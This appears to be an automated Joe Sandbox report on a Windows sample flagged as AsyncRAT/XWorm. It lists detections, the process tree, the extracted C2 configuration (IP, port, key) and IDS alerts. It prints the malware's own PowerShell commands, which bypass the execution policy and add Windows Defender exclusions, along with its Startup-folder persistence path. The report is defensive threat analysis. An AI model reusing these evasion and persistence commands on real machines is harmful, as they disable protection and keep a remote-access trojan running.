Edit tour

Windows Analysis Report
03VPFXH490.exe

Overview

General Information

Sample name:	03VPFXH490.exe renamed because original name is a hash value
Original sample name:	f9a6811d7a9d5e06d73a68fc729ce66c.exe
Analysis ID:	1574851
MD5:	f9a6811d7a9d5e06d73a68fc729ce66c
SHA1:	c882143d5fde4b2e7edb5a9accb534ba17d754ef
SHA256:	c583d0a367ecffa74b82b78116bbb04b7c92bed0300ed1c3adc4ef3250fbb9cc
Tags:	AsyncRATexeRATuser-abuse_ch
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

03VPFXH490.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\03VPFXH490.exe" MD5: F9A6811D7A9D5E06D73A68FC729CE66C)

powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '03VPFXH490.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
03VPFXH490.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
03VPFXH490.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
03VPFXH490.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
03VPFXH490.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x81a4:$s6: VirtualBox 0x8102:$s8: Win32_ComputerSystem 0x8b52:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8bef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8d04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8800:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Java Update (32bit).exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\ProgramData\Java Update (32bit).exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\Java Update (32bit).exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\Java Update (32bit).exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x81a4:$s6: VirtualBox 0x8102:$s8: Win32_ComputerSystem 0x8b52:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8bef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8d04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8800:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7fa4:$s6: VirtualBox 0x7f02:$s8: Win32_ComputerSystem 0x8952:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89ef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8b04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8600:$cnc4: POST / HTTP/1.1
00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2941379266.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 03VPFXH490.exe PID: 7316	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: 03VPFXH490.exe PID: 7316	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.03VPFXH490.exe.a50000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.03VPFXH490.exe.a50000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.03VPFXH490.exe.a50000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.03VPFXH490.exe.a50000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x81a4:$s6: VirtualBox 0x8102:$s8: Win32_ComputerSystem 0x8b52:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8bef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8d04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8800:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03VPFXH490.exe", ParentImage: C:\Users\user\Desktop\03VPFXH490.exe, ParentProcessId: 7316, ParentProcessName: 03VPFXH490.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', ProcessId: 7448, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03VPFXH490.exe", ParentImage: C:\Users\user\Desktop\03VPFXH490.exe, ParentProcessId: 7316, ParentProcessName: 03VPFXH490.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', ProcessId: 7448, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\03VPFXH490.exe, ProcessId: 7316, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03VPFXH490.exe", ParentImage: C:\Users\user\Desktop\03VPFXH490.exe, ParentProcessId: 7316, ParentProcessName: 03VPFXH490.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe', ProcessId: 7448, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:45:56.562516+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:00.823486+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:01.474616+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:06.474257+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:08.743008+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:11.491415+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:16.516874+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:21.547241+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:21.952041+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:26.671858+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:30.889531+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:31.532464+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:34.549061+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:36.529959+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:41.532108+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:46.538787+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:49.102934+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:51.543235+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:56.556107+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:00.606699+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:00.912470+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:01.565888+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:06.575947+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:10.734326+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:11.583663+0100	2852870	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:46:08.774353+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:46:21.548935+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:46:34.550780+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:47:00.608558+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:47:10.735067+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.141.26.234	7000	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:46:00.823486+0100	2852874	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:30.889531+0100	2852874	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:00.912470+0100	2852874	1	Malware Command and Control Activity Detected	45.141.26.234	7000	192.168.2.4	49737	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:46:07.663515+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.141.26.234	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 03VPFXH490.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\Java Update (32bit).exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 03VPFXH490.exe

Malware Configuration Extractor: Xworm {"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Java Update (32bit).exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: 03VPFXH490.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Java Update (32bit).exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 03VPFXH490.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 03VPFXH490.exe	String decryptor: 45.141.26.234
Source: 03VPFXH490.exe	String decryptor: 7000
Source: 03VPFXH490.exe	String decryptor: <123456789>
Source: 03VPFXH490.exe	String decryptor: <Xwormmm>
Source: 03VPFXH490.exe	String decryptor: Xworm
Source: 03VPFXH490.exe	String decryptor: USB.exe
Source: 03VPFXH490.exe	String decryptor: %ProgramData%
Source: 03VPFXH490.exe	String decryptor: Java Update (32bit).exe

Source: 03VPFXH490.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 03VPFXH490.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791\gdiplus.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\SYSTEM32\MSVFW32.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.mui	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.234:7000 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.234:7000 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 45.141.26.234:7000
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49737 -> 45.141.26.234:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.141.26.234

Yara detected Generic Downloader

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 45.141.26.234:7000

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ip-api.com

Source: 03VPFXH490.exe, Java Update (32bit).exe.0.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1775096450.0000023A10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860716635.0000020C99A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1981436782.0000019590074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1761890443.0000023A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C89C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 03VPFXH490.exe, 00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1761890443.0000023A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C899E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1761890443.0000023A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C89C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
